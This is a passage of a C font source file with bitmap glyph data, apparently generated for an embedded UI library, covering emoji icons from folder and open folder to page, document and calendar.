0x7, 0xff, 0xff, 0xff, 0xfc, 0x7c, 0x0, 0x0,
0x1, 0xff, 0xff, 0xff, 0xfe, 0x7c, 0x0, 0x0,
0x0, 0x7f, 0xff, 0xff, 0xff, 0xfc, 0x0, 0x0,
0x0, 0xf, 0xff, 0xff, 0xff, 0xf8, 0x0, 0x0,
0x0, 0x1, 0xff, 0xff, 0xff, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x3f, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xff, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0,
/* U+1F4C1 "📁" */
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0x0, 0x38,
0x0, 0x0, 0x3f, 0xf8, 0x0, 0x0, 0x0, 0xff,
0x80, 0x0, 0x7f, 0xff, 0x80, 0x0, 0x1, 0xff,
0xf8, 0x0, 0x3f, 0xf8, 0x18, 0x0, 0x7, 0xff,
0xf1, 0x80, 0x7, 0xf0, 0x1, 0xc0, 0x1f, 0xff,
0xc0, 0x18, 0x0, 0x70, 0x0, 0x1c, 0x3f, 0xff,
0x0, 0x1, 0x80, 0x7, 0x0, 0x0, 0xff, 0xfe,
0x0, 0x0, 0x18, 0x0, 0x70, 0x0, 0xf, 0xf8,
0x0, 0x0, 0x1, 0xbf, 0x7, 0x0, 0x0, 0xe0,
0x0, 0x0, 0x0, 0x7f, 0xf0, 0x70, 0x0, 0x0,
0x0, 0x0, 0x1, 0xff, 0xff, 0x7f, 0x0, 0x0,
0x0, 0x0, 0x7, 0xff, 0xf0, 0x6f, 0xf0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xc0, 0x6, 0xf0, 0x0,
0x0, 0x0, 0x3f, 0xff, 0x0, 0x0, 0x6e, 0x0,
0x0, 0x0, 0x7f, 0xfe, 0x0, 0x0, 0xe, 0xe0,
0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0, 0xee,
0x0, 0x0, 0x7, 0xf0, 0x0, 0x0, 0x0, 0xe,
0xe0, 0x0, 0x0, 0x60, 0x0, 0x0, 0x0, 0x0,
0xce, 0x0, 0x0, 0xe, 0x0, 0x0, 0x0, 0x0,
0xc, 0xe0, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x0,
0x0, 0xce, 0x0, 0x0, 0xc, 0x0, 0x0, 0x0,
0x0, 0x1c, 0xe0, 0x0, 0x0, 0xc0, 0x0, 0x0,
0x0, 0x1, 0xce, 0x0, 0x0, 0x1c, 0x0, 0x0,
0x0, 0x0, 0x1c, 0xe0, 0x0, 0xf, 0xc0, 0x0,
0x0, 0x0, 0x1, 0xce, 0x0, 0x3f, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x18, 0xe0, 0xff, 0xfe, 0x0,
0x0, 0x0, 0x0, 0x1, 0x8e, 0x3f, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0x18, 0xe3, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x8e, 0x38, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0xe3, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x8e, 0x30,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x30, 0xe3,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xe,
0x70, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x30,
0xe7, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xe, 0x70, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0xe6, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xe, 0x60, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x60, 0xe6, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x6, 0xe, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x60, 0xee, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0xe, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe0, 0xec, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0xe, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe0, 0xec, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xc, 0xf, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xc0, 0xfc, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1c, 0xf, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1c, 0xf,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc0,
0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf8,
0xf, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff,
0x80, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff,
0xe0, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff,
0xc0, 0x0, 0xf0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xc0, 0x0, 0xf, 0x0, 0x0, 0x0, 0x1, 0xff,
0xc0, 0x0, 0x0, 0xf0, 0x0, 0x0, 0x1, 0xff,
0xc0, 0x0, 0x0, 0xf, 0x0, 0x0, 0x1, 0xff,
0xc0, 0x0, 0x0, 0x0, 0xf0, 0x0, 0x1, 0xff,
0xc0, 0x0, 0x0, 0x0, 0xe, 0x0, 0x1, 0xff,
0xc0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x1, 0xff,
0x80, 0x0, 0x0, 0x0, 0x0, 0xe, 0x1, 0xff,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe1, 0xff,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xff,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0,
/* U+1F4C2 "📂" */
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xff, 0xc0, 0x0, 0x0, 0x0,
0xe0, 0x0, 0x0, 0xf, 0xff, 0xf0, 0x0, 0x0,
0xf, 0xf8, 0x0, 0x0, 0x3f, 0xfc, 0xc, 0x0,
0x0, 0xff, 0xfe, 0x0, 0x0, 0xf, 0xe0, 0x3,
0x0, 0xf, 0xff, 0xf1, 0x80, 0x0, 0x3, 0x80,
0x0, 0xe0, 0xff, 0xff, 0x0, 0x60, 0x0, 0x0,
0xe0, 0x0, 0x3f, 0xff, 0xe0, 0x0, 0x18, 0x0,
0x0, 0x38, 0x0, 0x7, 0xfe, 0x0, 0x0, 0x6,
0x0, 0x0, 0xc, 0x0, 0x1, 0xe0, 0x0, 0x0,
0x1, 0x80, 0x0, 0x7, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x60, 0x0, 0x7, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x18, 0x0, 0x3, 0xf0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x6, 0x0, 0x0, 0xf0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0x80, 0x0,
0x38, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x60,
0x0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x18, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x6, 0x1, 0xfe, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0x9f, 0xff, 0xb8, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xff, 0xfc, 0xee, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1f, 0xff, 0xc0, 0x73,
0x80, 0x0, 0x0, 0x0, 0x1, 0xff, 0xfc, 0x0,
0x1c, 0xe0, 0x0, 0x0, 0x0, 0x1f, 0xff, 0xc0,
0x0, 0x6, 0x38, 0x0, 0x0, 0x0, 0x7, 0xfc,
0x0, 0x0, 0x3, 0x8e, 0x0, 0x0, 0x0, 0x1,
0xc0, 0x0, 0x0, 0x0, 0xc3, 0x80, 0x0, 0x0,
0x0, 0xe0, 0x0, 0x0, 0x0, 0x70, 0xe0, 0x0,
0x0, 0x0, 0x38, 0x0, 0x0, 0x0, 0x1c, 0x38,
0x0, 0x0, 0x0, 0xc, 0x0, 0x0, 0x0, 0xe,
0xe, 0x0, 0x0, 0x0, 0x7, 0x0, 0x0, 0x0,
0x3, 0x83, 0x80, 0x0, 0x0, 0x1, 0xc0, 0x0,
0x0, 0x0, 0xc0, 0xe0, 0x0, 0x0, 0x0, 0x60,
0x0, 0x0, 0x0, 0x70, 0x38, 0x0, 0x0, 0x3,
0xf8, 0x0, 0x0, 0x0, 0x18, 0xe, 0x0, 0x0,
0x3f, 0xfe, 0x0, 0x0, 0x0, 0xe, 0x3, 0x80,
0x3, 0xff, 0xf8, 0x0, 0x0, 0x0, 0x3, 0x80,
0xe0, 0x0, 0xff, 0x80, 0x0, 0x0, 0x0, 0x1,
0xc0, 0x38, 0x0, 0x78, 0x0, 0x0, 0x0, 0x0,
0x0, 0x70, 0xe, 0x0, 0x1c, 0x0, 0x0, 0x0,
0x0, 0x0, 0x18, 0x3, 0x80, 0xe, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x0, 0xe0, 0x3, 0x80,
0x0, 0x0, 0x0, 0x0, 0x3, 0x0, 0x38, 0x0,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0xe,
0x0, 0x70, 0x0, 0x0, 0x0, 0x0, 0x0, 0x70,
0x3, 0x80, 0x18, 0x0, 0x0, 0x0, 0x0, 0x0,
0x38, 0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe, 0x0, 0x38, 0x3, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0x0, 0xe, 0x1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xc0, 0x3, 0x80, 0x60,
0x0, 0x0, 0x0, 0x0, 0x0, 0x60, 0x0, 0xe0,
0x38, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0,
0x38, 0xc, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe,
0x0, 0xe, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x3, 0x81, 0x80, 0x0, 0x0, 0x0,
0x0, 0x1, 0xc0, 0x0, 0xe0, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe0, 0x0, 0x38, 0x30, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf8, 0x0, 0xe, 0x1c,
0x0, 0x0, 0x0, 0x0, 0xf, 0xfc, 0x0, 0x3,
0x86, 0x0, 0x0, 0x0, 0x0, 0x3f, 0xf8, 0x0,
0x0, 0xe3, 0x80, 0x0, 0x0, 0x0, 0xff, 0xc0,
0x0, 0x0, 0x38, 0xe0, 0x0, 0x0, 0x3, 0xff,
0x0, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0, 0xf,
0xfc, 0x0, 0x0, 0x0, 0x3, 0x9c, 0x0, 0x0,
0x7f, 0xf0, 0x0, 0x0, 0x0, 0x0, 0xe6, 0x0,
0x1, 0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x3b,
0x80, 0x7, 0xff, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe, 0xc0, 0x1f, 0xf8, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0xf0, 0x7f, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf9, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0,
/* U+1F4C3 "📃" */
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x3,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8, 0xe,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x38,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x80, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x3, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0xe, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x38, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x80, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x3, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0x38, 0xe, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe0, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x80, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x3, 0x80, 0x1f, 0xff,
0xff, 0xff, 0x0, 0x38, 0xe, 0x0, 0x7f, 0xff,
0xff, 0xfc, 0x0, 0xe0, 0x38, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0x80, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x3, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x38, 0xe, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe0, 0x38, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x80, 0xe0, 0x7, 0xff, 0xff, 0xff,
0xc0, 0xe, 0x3, 0x80, 0x1f, 0xff, 0xff, 0xff,
0x0, 0x38, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0x38, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0x80, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0,
0x38, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe0, 0x38, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3,
0x80, 0xe0, 0x7, 0xff, 0xff, 0xff, 0xc0, 0xe,
0x3, 0x80, 0x1f, 0xff, 0xff, 0xff, 0x0, 0x38,
0xe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe0,
0x38, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x80,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x3,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0xe,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x38,
0x1, 0xff, 0xff, 0xff, 0xf0, 0x3, 0x80, 0xe0,
0x7, 0xff, 0xff, 0xff, 0xc0, 0xe, 0x3, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0xe, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x38, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x80, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x3, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0x38, 0xe, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe0, 0x38, 0x1, 0xff,
0xf8, 0x0, 0x0, 0x3, 0x80, 0xe0, 0x7, 0xff,
0xe0, 0x0, 0x0, 0xe, 0x3, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x38, 0xe, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe0, 0x38, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0x80, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x3, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x38, 0xe, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe0, 0x38, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x80, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe, 0x3, 0x80, 0xf, 0xff, 0xff, 0xff,
0xff, 0xff, 0xee, 0x0, 0x3f, 0xff, 0xff, 0xff,
0xff, 0xff, 0xb8, 0x0, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x60, 0x3, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1d, 0xc0, 0x1c, 0x0, 0x0, 0x0, 0x0,
0x0, 0x77, 0x0, 0x70, 0x0, 0x0, 0x0, 0x0,
0x1, 0xdc, 0x1, 0x80, 0x0, 0x0, 0x0, 0x0,
0x7, 0x38, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x38, 0xf0, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x3,
0xc1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0,
/* U+1F4C4 "📄" */
0xff, 0xff, 0xff, 0xff, 0xfe, 0x0, 0x1f, 0xff,
0xff, 0xff, 0xff, 0xe0, 0x3, 0x80, 0x0, 0x0,
0x0, 0x7e, 0x0, 0x70, 0x0, 0x0, 0x0, 0xf,
0xe0, 0xe, 0x0, 0x0, 0x0, 0x1, 0xde, 0x1,
0xc0, 0x0, 0x0, 0x0, 0x39, 0xe0, 0x38, 0x0,
0x0, 0x0, 0x7, 0x1e, 0x7, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe0, 0xe0, 0x0, 0x0, 0x0, 0x1c,
0xe, 0x1c, 0x0, 0x0, 0x0, 0x3, 0x80, 0xe3,
0x80, 0x0, 0x0, 0x0, 0x70, 0xe, 0x70, 0x0,
0x0, 0x0, 0xe, 0x0, 0xee, 0x0, 0x0, 0x0,
0x1, 0xc0, 0xf, 0xc0, 0x0, 0x0, 0x0, 0x3f,
0xff, 0xf8, 0x0, 0x0, 0x0, 0x7, 0xff, 0xff,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7c, 0x0, 0x0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0x0, 0x0,
0x1, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3e,
0x1, 0xff, 0xff, 0xff, 0xf8, 0x7, 0xc0, 0x3f,
0xff, 0xff, 0xff, 0x0, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7c,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0x80, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3e, 0x1, 0xff, 0xff, 0xff, 0xf8,
0x7, 0xc0, 0x3f, 0xff, 0xff, 0xff, 0x0, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7c, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1, 0xf0,
0xf, 0xff, 0xff, 0xff, 0xc0, 0x3e, 0x1, 0xff,
0xff, 0xff, 0xf8, 0x7, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1f, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7c, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0x0,
0x0, 0x1, 0xf0, 0xf, 0xff, 0xff, 0xff, 0xc0,
0x3e, 0x1, 0xff, 0xff, 0xff, 0xf8, 0x7, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7c, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0x80,
0x7f, 0xfe, 0x0, 0x0, 0x1, 0xf0, 0xf, 0xff,
0xc0, 0x0, 0x0, 0x3e, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7c, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1,
0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3e, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
/* U+1F4C5 "📅" */
0xff, 0x9f, 0xff, 0xff, 0xff, 0xff, 0xf7, 0xff,
0xfe, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xdf, 0xff,
0xf9, 0xff, 0xff, 0xff, 0xff, 0xff, 0x7f, 0xff,
0xe7, 0xff, 0xff, 0xff, 0xff, 0xf9, 0xff, 0xfe,
0x7, 0xff, 0xff, 0xff, 0xff, 0xc1, 0xff, 0xf8,
0x1f, 0xff, 0xff, 0x3f, 0xff, 0x7, 0xff, 0xe0,
0x7f, 0x7f, 0xfc, 0xff, 0xfc, 0x1f, 0xff, 0x81,
0xfd, 0xff, 0xf3, 0xff, 0xf0, 0x7f, 0xff, 0xf,
0xf7, 0xff, 0xcf, 0xff, 0xe3, 0xff, 0xff, 0xff,
0xdc, 0xf3, 0x33, 0xcf, 0xff, 0xff, 0xff, 0xff,
0x73, 0xcc, 0xe7, 0x3f, 0xff, 0xff, 0xff, 0xfd,
0xcf, 0x33, 0x9c, 0xff, 0xff, 0xff, 0xff, 0xf7,
0x3c, 0xcf, 0x67, 0xff, 0xff, 0xff, 0xff, 0xdc,
0xf3, 0x3c, 0x9f, 0xff, 0xff, 0xff, 0xff, 0x73,
0xcc, 0xf2, 0x7f, 0xff, 0xff, 0xff, 0xb9, 0xce,
0x33, 0xeb, 0xff, 0xff, 0xff, 0xfe, 0x7, 0x0,
0xc7, 0x8f, 0xff, 0xff, 0xff, 0xf8, 0x1e, 0x13,
0x1f, 0x3f, 0xff, 0xff, 0xff, 0xf9, 0xfc, 0xcf,
0x79, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xc7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf9,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1f, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7e, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1,
0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xe0, 0x0, 0x7, 0x80, 0x3f, 0xff, 0x0, 0x1f,
0x80, 0x0, 0xfe, 0x0, 0xff, 0xfc, 0x0, 0x7e,
0x0, 0x7, 0xf8, 0x3, 0xff, 0xf0, 0x1, 0xf8,
0x0, 0x1f, 0xe0, 0x0, 0x3, 0x80, 0x7, 0xe0,
0x0, 0x7f, 0x80, 0x0, 0x1e, 0x0, 0x1f, 0x80,
0x0, 0x1e, 0x0, 0x0, 0x70, 0x0, 0x7e, 0x0,
0x0, 0x78, 0x0, 0x3, 0x80, 0x1, 0xf8, 0x0,
0x1, 0xe0, 0x0, 0xe, 0x0, 0x7, 0xe0, 0x0,
0x7, 0x80, 0x0, 0x70, 0x0, 0x1f, 0x80, 0x0,
0x1e, 0x0, 0x1, 0xc0, 0x0, 0x7e, 0x0, 0x0,
0x78, 0x0, 0xf, 0x0, 0x1, 0xf8, 0x0, 0x1,
0xe0, 0x0, 0x38, 0x0, 0x7, 0xe0, 0x0, 0x7,
0x80, 0x1, 0xe0, 0x0, 0x1f, 0x80, 0x0, 0x1e,
0x0, 0x7, 0x80, 0x0, 0x7e, 0x0, 0x0, 0x78,
0x0, 0x1e, 0x0, 0x1, 0xf8, 0x0, 0x1, 0xe0,
0x0, 0x70, 0x0, 0x7, 0xe0, 0x0, 0x7, 0x80,
0x1, 0xc0, 0x0, 0x1f, 0x80, 0x0, 0x1e, 0x0,
0xf, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x78, 0x0,
0x3c, 0x0, 0x1, 0xf8, 0x0, 0x1, 0xe0, 0x0,
0xf0, 0x0, 0x7, 0xe0, 0x0, 0xff, 0xf8, 0x3,
0xc0, 0x0, 0x1f, 0x80, 0x3, 0xff, 0xe0, 0xf,
0x0, 0x0, 0x7e, 0x0, 0xf, 0xff, 0x80, 0x3c,
0x0, 0x1, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1f, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7e, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1f, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
/* U+1F4C6 "📆" */
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x3, 0xf8, 0xff, 0xff, 0xff, 0xff, 0xff, 0x1f,
0xc0, 0xfc, 0x1f, 0xff, 0xff, 0xff, 0xff, 0x83,
0xf0, 0x3f, 0x3, 0xff, 0xff, 0xe7, 0xff, 0xc0,
0xff, 0xff, 0xc0, 0xfc, 0xff, 0xf9, 0xff, 0xf0,
0x1f, 0xff, 0xf0, 0x3f, 0x3f, 0xfe, 0x7f, 0xfc,
0xf, 0xc7, 0xfc, 0x1f, 0xcf, 0xff, 0x9f, 0xff,
0x83, 0xf1, 0xff, 0x87, 0xf3, 0x3c, 0xe6, 0x73,
0xe1, 0xfc, 0x7f, 0xff, 0xfc, 0xcf, 0x39, 0x9c,
0xff, 0xff, 0x1f, 0xff, 0xff, 0x33, 0xce, 0x77,
0x3f, 0xff, 0xc7, 0xff, 0xff, 0xcc, 0xf3, 0x9c,
0xdf, 0xff, 0xf1, 0xff, 0xff, 0xf3, 0x3c, 0xe7,
0x27, 0xff, 0xfc, 0x7f, 0xff, 0xfc, 0xcf, 0x39,
0xe9, 0xff, 0xff, 0x1f, 0xff, 0xff, 0x3b, 0xce,
0x7a, 0xff, 0xff, 0xc7, 0xff, 0xf9, 0x8e, 0x63,
0x9f, 0x3f, 0xff, 0xf1, 0xff, 0xff, 0x7, 0x84,
0xe3, 0xcf, 0xff, 0xfc, 0x7f, 0xff, 0xff, 0xff,
0xff, 0xf7, 0xff, 0xff, 0x1f, 0xff, 0xff, 0xff,
0xff, 0xf9, 0xff, 0xff, 0xc7, 0xff, 0xff, 0xff,
0xff, 0xf8, 0xff, 0xff, 0xf1, 0xff, 0xff, 0xff,
0xff, 0xfe, 0x7f, 0xff, 0xfc, 0x7f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0x1f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xc7, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x71, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x7e, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0x1f, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc7, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x71, 0xf8,
0x0, 0x3, 0x80, 0x3f, 0xfe, 0x0, 0x1c, 0x7e,
